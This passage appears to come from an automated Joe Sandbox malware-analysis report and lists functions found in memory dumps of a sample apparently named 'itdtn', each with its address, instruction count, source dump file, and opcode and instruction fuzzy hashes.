                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71717e5bc0f6195aecefdcfff2748fc9fb5221bc8877f284c24d1ef91fe28646
                                                • Instruction ID: e0ce6515bae279fead6a3c190ba6b379307f613c5678d2af17915803680a8e65
                                                • Opcode Fuzzy Hash: 71717e5bc0f6195aecefdcfff2748fc9fb5221bc8877f284c24d1ef91fe28646
                                                • Instruction Fuzzy Hash: 6FF0E1367062056B9F156E9AAC84CAFBF6BFBD9270B50443EFA098B354CA3188159760
                                                Function 05B0C941 Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93a4bc7da1cadc7ca08a7ed980b7dbd6462530ff4f79d59431d30c984e4e6d3a
                                                • Instruction ID: f5a652f72f68183db2b04b9a105283f85a8ec7e1c535e8d080deb5a3088ebd9e
                                                • Opcode Fuzzy Hash: 93a4bc7da1cadc7ca08a7ed980b7dbd6462530ff4f79d59431d30c984e4e6d3a
                                                • Instruction Fuzzy Hash: 4A019E75300611AFC7059B25D418A1ABBE2EF8D720F1085A8E9068B7A4EF75EC42CB84
                                                Function 05FB23FD Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9691b952a1014f53aa9fe0d8025131d00dd8883ede690f7820842d7ae2d61079
                                                • Instruction ID: 0d2c5892ad7a00187941a17bdc457146e93ba253309534cd60c2d50b192aa595
                                                • Opcode Fuzzy Hash: 9691b952a1014f53aa9fe0d8025131d00dd8883ede690f7820842d7ae2d61079
                                                • Instruction Fuzzy Hash: 6921E274904229DBDB68DF24D898BEEBBB1BB48341F1040E9D519A3650DB745EC48F50
                                                Function 05FB1213 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b99b589ac77dd7a7277729f79a306fe8ac12278aec2bf544ac98ca734b5e1f6
                                                • Instruction ID: 74aea10e90a23ec8b1ca00ce207ef90bed694cd7d873fd34b64e40b64f62158f
                                                • Opcode Fuzzy Hash: 9b99b589ac77dd7a7277729f79a306fe8ac12278aec2bf544ac98ca734b5e1f6
                                                • Instruction Fuzzy Hash: 6F21E274904229DBDB68DF24D898BEEBBB1BB48340F1040E9D519A3650DB745EC48F50
                                                Function 05B0C950 Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9adefe5bb81a9a41d557f1f7af75e3d4c8d0a1604e90b922ed49850232f1713
                                                • Instruction ID: 992a9f99e4dc164646615749be284722c0d487a51efca3009738cf27968658a3
                                                • Opcode Fuzzy Hash: e9adefe5bb81a9a41d557f1f7af75e3d4c8d0a1604e90b922ed49850232f1713
                                                • Instruction Fuzzy Hash: 2F014675300611AFC7099B24D01891ABBB2EF8C711B108568E90A8B7A4DF75EC42CB94
                                                Function 05FCF5E0 Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3301fc4b4ebd367d2d538871838f7ee41a9babdef296039f0136f132456641b5
                                                • Instruction ID: a31987d8fa809c64f4c257d4618eab6e83f8aa8cf0ce6a1fdd0785cc29515c25
                                                • Opcode Fuzzy Hash: 3301fc4b4ebd367d2d538871838f7ee41a9babdef296039f0136f132456641b5
                                                • Instruction Fuzzy Hash: 91F0E932F482155FE71486189910B2BFBAAEFC8720F14447DE50A9B360CB7AAC41C794
                                                Function 05FB591C Relevance: .0, Instructions: 37COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1628cc1b869541c9167f028506f380275128b1d326ae6b048ac68c5b5e2693b0
                                                • Instruction ID: 598355974ee9778b64a8248b7a371ea09263f92d351940c0f8751dd71564f840
                                                • Opcode Fuzzy Hash: 1628cc1b869541c9167f028506f380275128b1d326ae6b048ac68c5b5e2693b0
                                                • Instruction Fuzzy Hash: EE11F774A02229CFDB64DF55E8A4AEEBBB5FB58340F1040EAE409A7740DB749E85CF40
                                                Function 05B0C6C8 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e38646959b90d86a7eca9bbacdf5b034fb80228fb84726fabb0e07fe692f0aa
                                                • Instruction ID: af67ae2b9e94578a6665836c674c1c28703a3e6637b4bcb5f3c3f96dc37e81b0
                                                • Opcode Fuzzy Hash: 9e38646959b90d86a7eca9bbacdf5b034fb80228fb84726fabb0e07fe692f0aa
                                                • Instruction Fuzzy Hash: DDF049363507009FC7049B29D855E6ABBAAEFC9721F1580A9F946CB3A1CE31EC01CB54
                                                Function 05B0C6D8 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 19fdf153ad82a6eb3069e3599160c393225dbb8c300f330c84ad4618dd11905f
                                                • Instruction ID: cfb5b1287de9763929e01d9dc43d66d05801989fe66f9904db76cf34c2481cab
                                                • Opcode Fuzzy Hash: 19fdf153ad82a6eb3069e3599160c393225dbb8c300f330c84ad4618dd11905f
                                                • Instruction Fuzzy Hash: 84F03A353502009FC3049B19D854D7ABBEAEFC8721B1484A9F9068B3A0CE31EC02CB90
                                                Function 05FB483F Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 765f3be1abf0d6793c5358ce76d7dee52a86cf06aaf31bdb04391165fa08c9df
                                                • Instruction ID: 16adae48cfcf6e0d1c1e6e9fdec6c3a7f0cab863f787a06145d983731b6c452a
                                                • Opcode Fuzzy Hash: 765f3be1abf0d6793c5358ce76d7dee52a86cf06aaf31bdb04391165fa08c9df
                                                • Instruction Fuzzy Hash: A3010478A452298FDB64DF24DC98A99BBB1FB58300F1041EAE40DE3350DB349E81CF00
                                                Function 05B08731 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c5f0cf0f70b4a5afc46e8a05ef1f7b77762264402a7d59968d8eaac50a62d407
                                                • Instruction ID: 327b1141b3e0a5e0edc09463d99eedcbd1587794aa88130a7207aa551beda1d3
                                                • Opcode Fuzzy Hash: c5f0cf0f70b4a5afc46e8a05ef1f7b77762264402a7d59968d8eaac50a62d407
                                                • Instruction Fuzzy Hash: A0E0D82671932183E761162F3844B3BDE95EB8A920FC045BDFC29D7288CE509D028794
                                                Function 05B08780 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c78206dc945cf92b2a34ce6faea44e99a6218b84fa55d0626fb814678c612d8e
                                                • Instruction ID: d6f45dd643a01f61933607e31372f1cb84fafe2413f788beb07818eb83f9bdf0
                                                • Opcode Fuzzy Hash: c78206dc945cf92b2a34ce6faea44e99a6218b84fa55d0626fb814678c612d8e
                                                • Instruction Fuzzy Hash: 9EF0A0322043455BC7049B2AFC84D4BFFAEEFC0210B94CA3AE00A87225DB74EC0AC794
                                                Function 05B0088B Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4abae22d35b2befac84b3e6b1538f813bb430a1de04e3d635c951cf15007679e
                                                • Instruction ID: 2fdd6e0906e3464b828f96263ec9c92b0fd90d43881d76f79f9ed039b2142b11
                                                • Opcode Fuzzy Hash: 4abae22d35b2befac84b3e6b1538f813bb430a1de04e3d635c951cf15007679e
                                                • Instruction Fuzzy Hash: 64F03036700519BBC710DA4AD885E62FBA9FB84360B95C165E909D7241C731FC52C7E4
                                                Function 05FCDC78 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29f91fccefe1514bb9a4b5c1dde7d3638e578da0898dcfdc0af9ed3587256256
                                                • Instruction ID: 469f2e84255940c491ea9ea8be552d19f06d938f0e032409d508163eff7a85a0
                                                • Opcode Fuzzy Hash: 29f91fccefe1514bb9a4b5c1dde7d3638e578da0898dcfdc0af9ed3587256256
                                                • Instruction Fuzzy Hash: A7F01C74D05248EFCB90EFA8D940AADBFF8AB48311F14C1EAE858D3341D6359A51DF50
                                                Function 05B0174B Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 47b15082a849585ccc0af7290ae97af03785cb1fb5ca8b839a9c1532972a975c
                                                • Instruction ID: 72c1205883ec12f419cb813aab00a9f18921a8f22f8b8d18908f5da4355be18d
                                                • Opcode Fuzzy Hash: 47b15082a849585ccc0af7290ae97af03785cb1fb5ca8b839a9c1532972a975c
                                                • Instruction Fuzzy Hash: CDF06571E04218AFCB09EB58D48D7EDBFB6EB84621F44C095E007D3290EF705A82CB94
                                                Function 05B01750 Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7e2b1e86efcc40bf0c947b8ce9a85babdcc630cd119a47d374145d1d71712f5
                                                • Instruction ID: 81ac26bcff42b9a188cc6ce4fc65863ae9de82b7b4a273a74d284292fc2456d8
                                                • Opcode Fuzzy Hash: e7e2b1e86efcc40bf0c947b8ce9a85babdcc630cd119a47d374145d1d71712f5
                                                • Instruction Fuzzy Hash: 61F06D71E04218AFCB09EB98D44C7EDBFB6EB84620F04C099E00793290EF701A82CB94
                                                Function 05B08790 Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a68d1e39f9c10defe6c0c796be96a9e71d2e4a02b16f34bc173471d07c6187c
                                                • Instruction ID: 46d2a265cbc46cd09374dbcf47c68c578aacaa6941ea2fc452b7aeb1b13d42b7
                                                • Opcode Fuzzy Hash: 5a68d1e39f9c10defe6c0c796be96a9e71d2e4a02b16f34bc173471d07c6187c
                                                • Instruction Fuzzy Hash: DEE01A313043095BCB149A1AF884C4BFF9EEEC0264710CA3AA10A87229DE74ED4AC694
                                                Function 05FC4FB8 Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7a145678c68de5afd711f3a6292a144c4b599ce18a3f13651dad0f9577a81ee
                                                • Instruction ID: 504edcea1c4b41517f2dbfc65e7e74a4a2f5a021368c4bf1048011def5968846
                                                • Opcode Fuzzy Hash: f7a145678c68de5afd711f3a6292a144c4b599ce18a3f13651dad0f9577a81ee
                                                • Instruction Fuzzy Hash: 17E0C974D05208EFCB54DFA8D54469CBBF5EB48311F10C1A99809A3351D6359A51DF84
                                                Function 05FC8F88 Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7a145678c68de5afd711f3a6292a144c4b599ce18a3f13651dad0f9577a81ee
                                                • Instruction ID: c0721e98d90fe37b4c9ccc08b920f271a14bd8546a2a3bd97c668f2b752d57dc
                                                • Opcode Fuzzy Hash: f7a145678c68de5afd711f3a6292a144c4b599ce18a3f13651dad0f9577a81ee
                                                • Instruction Fuzzy Hash: CDE0C274E09208EFCB94DFA8D940AACBBF5EB48310F10C1AA9809A3355D6369A51DF80
                                                Function 05FB5C1B Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b204a46dc6c3d5860a67d643bf9f51b5f56c8f6a483d639fcde719f0a6818533
                                                • Instruction ID: dd443f7c3fc17aaaf119b2410d59c80856ace3ff8bcb1e86eb506e3340b5887e
                                                • Opcode Fuzzy Hash: b204a46dc6c3d5860a67d643bf9f51b5f56c8f6a483d639fcde719f0a6818533
                                                • Instruction Fuzzy Hash: CCF03A74A00218CFEB54DF64C884E9E7BB2FB58310F1041D6D009A3354CE705E818F90
                                                Function 05FCC018 Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7a145678c68de5afd711f3a6292a144c4b599ce18a3f13651dad0f9577a81ee
                                                • Instruction ID: a9fe850dff31a3cc92dde242954ab3d96bd3779cc87dfda74e94dca64b22f8c4
                                                • Opcode Fuzzy Hash: f7a145678c68de5afd711f3a6292a144c4b599ce18a3f13651dad0f9577a81ee
                                                • Instruction Fuzzy Hash: 80E0C974D05208EFCB54DFA8D54169CBBF5EB88311F14C1A9D81993351D6359A51DF40
                                                Function 05B037C8 Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7dbef9be145dbea457313e318bde6b9d54ce6d5c512733a520780db2715fb817
                                                • Instruction ID: 5010b4c3728a72bc09809c592db941c3226d0522e921db8f45dd098c32612185
                                                • Opcode Fuzzy Hash: 7dbef9be145dbea457313e318bde6b9d54ce6d5c512733a520780db2715fb817
                                                • Instruction Fuzzy Hash: DAE08C31784308AFCB64B664880DB72BADAAF45615F6418EAE6079B2C0DD62F8018361
                                                Function 05FB7A39 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ef2bf72ca8ab3ed36a02a7d178e5406dbbc8f069351aaa815bf815d3517dc31
                                                • Instruction ID: 3767d5486c87516c743a4cef646b7ee10076e1e4541ac40b80a2eb2eea5fa0d7
                                                • Opcode Fuzzy Hash: 8ef2bf72ca8ab3ed36a02a7d178e5406dbbc8f069351aaa815bf815d3517dc31
                                                • Instruction Fuzzy Hash: 1BF0A079801228CFDF20CF20C948BD8BBB2EB04314F9042D6C44993281D7380E82DF00
                                                Function 05FCD410 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2125fc805585c30ea2da09e516c4e566cbc67713360ccb6cc8e84bc128949e05
                                                • Instruction ID: 77cc1515e0503c9e5427d118269f03fe2efa10b634e3f3e16bce5c15df00df78
                                                • Opcode Fuzzy Hash: 2125fc805585c30ea2da09e516c4e566cbc67713360ccb6cc8e84bc128949e05
                                                • Instruction Fuzzy Hash: 64E01A70D0920C9FCB50EFB8D9456AD7EB5AB48206F9041FA990993354DA705A908B81
                                                Function 05FCECE8 Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 774cc52dbe0765bd0193b7ff3161fc67e169e5a4fe3d2ecd45f63e54ed68e8df
                                                • Instruction ID: 381cf622c49c6322ea0e84f362b511edfbe4a99d57fc57634f18c9c97e80d149
                                                • Opcode Fuzzy Hash: 774cc52dbe0765bd0193b7ff3161fc67e169e5a4fe3d2ecd45f63e54ed68e8df
                                                • Instruction Fuzzy Hash: F9E0DF74809108AFC700CFA4D5009ACBFBCAB45300F14C0EDD80453345C6319A41DB90
                                                Function 05FC7980 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab6b7c75a94fcbb1d9877d480cb272738fa59e7dbedc0ac3788bdd927f4aa68b
                                                • Instruction ID: 55e82bd25b5e03fcf1413a2a5fe401e2db793ae0e8d8fab8454db53b592f9f04
                                                • Opcode Fuzzy Hash: ab6b7c75a94fcbb1d9877d480cb272738fa59e7dbedc0ac3788bdd927f4aa68b
                                                • Instruction Fuzzy Hash: 51E01234D0A208AFCB54EFA8D6416ACFBB9EB88201F10C1EED85857351D6369A42DF80
                                                Function 05FC9FA0 Relevance: .0, Instructions: 19COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9a3edfcb14a689ed2144a5c5876d2c056a3a6b797b313927ec1bf25aed317e6
                                                • Instruction ID: feaf627e8781eec73a4bc06693279b9346c67ec93d7298dcb22fa7265af39619
                                                • Opcode Fuzzy Hash: c9a3edfcb14a689ed2144a5c5876d2c056a3a6b797b313927ec1bf25aed317e6
                                                • Instruction Fuzzy Hash: 75E0EC70D56208DFCB50EFB8D64569DBFF8AB04701F5081EDDC0993350E6705A90CB41
                                                Function 05FCC818 Relevance: .0, Instructions: 19COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 64677a5c61d8e58f1b21b7b6ea1f8394fa178ce38324cbec765028b195bbb855
                                                • Instruction ID: 82873f5bc28f615109cedadec0c962508a5b931ecd327fde95943cad750a2550
                                                • Opcode Fuzzy Hash: 64677a5c61d8e58f1b21b7b6ea1f8394fa178ce38324cbec765028b195bbb855
                                                • Instruction Fuzzy Hash: C8E08C34D09108DBC704DFA4D6405AEBBB8AB85300F68D1ECC80823381CA329E42CB80
                                                Function 05B0A1F9 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f1a4cee480e115a8fc78a7c7a0d60a0c51c358c2049495399def68dca4abb1a
                                                • Instruction ID: b7151c6380ade44eccc81a9336c63521dd328ca67b227e8486d13c3f8a585376
                                                • Opcode Fuzzy Hash: 9f1a4cee480e115a8fc78a7c7a0d60a0c51c358c2049495399def68dca4abb1a
                                                • Instruction Fuzzy Hash: D3D02B31304B154BD791D32CB9407563BE59B8C100B048668E445C3305DF20EC4643D8
                                                Function 05FCCBC8 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2091f181600cac4d9859040f84f3888ebe9f954d7420c1f3c7526f5f1d2df61c
                                                • Instruction ID: 0bf2908cc556914ff01675993e781d6ef3b8c002e7d21319a59f072b687b25fc
                                                • Opcode Fuzzy Hash: 2091f181600cac4d9859040f84f3888ebe9f954d7420c1f3c7526f5f1d2df61c
                                                • Instruction Fuzzy Hash: 13C02B31CDF3068EC26C2AD4670C3B83FDCD70B316F8458B4A00F01029CE645890C224
                                                Function 05B0E5B8 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0d0df0a84594b65b03d05935d4fbc670534be61227cd89ab55a3474d9dfdb8d
                                                • Instruction ID: 3381e4393643bddc077c9d07fb62cf86e5124858a983287b7261c1be870767f4
                                                • Opcode Fuzzy Hash: f0d0df0a84594b65b03d05935d4fbc670534be61227cd89ab55a3474d9dfdb8d
                                                • Instruction Fuzzy Hash: FAD0A9342003449BC300DB28F801E817F24BB16220F9040C4F99287332C323A410EA50
                                                Function 05B0C6A0 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06728c3646c7ef1933b277592edd40061a54d94ed509138ef41671ab602cdcb4
                                                • Instruction ID: 4edb6a46c7f921b9798b703344f881569a596b4aba63144767af0c0239011421
                                                • Opcode Fuzzy Hash: 06728c3646c7ef1933b277592edd40061a54d94ed509138ef41671ab602cdcb4
                                                • Instruction Fuzzy Hash: 1BD02234200644DFD340DB39F406E807F64EB16A24FC08084F80587233C332A844CF02
                                                Function 05B0FF71 Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 113da7e1dea2925eb47426d752f44ceb07621c39f1a0d9f37b2cc39986ef4132
                                                • Instruction ID: 4a0d5d2c33e7be696c4846a331a7a1d7bc6da3f96e8671fe30ae9c1be503a5e2
                                                • Opcode Fuzzy Hash: 113da7e1dea2925eb47426d752f44ceb07621c39f1a0d9f37b2cc39986ef4132
                                                • Instruction Fuzzy Hash: 9EC012791002009FDB054F14D5857197B72D7D1300FD58474A01493B40CA399C51EB25
                                                Function 05B0A1E1 Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
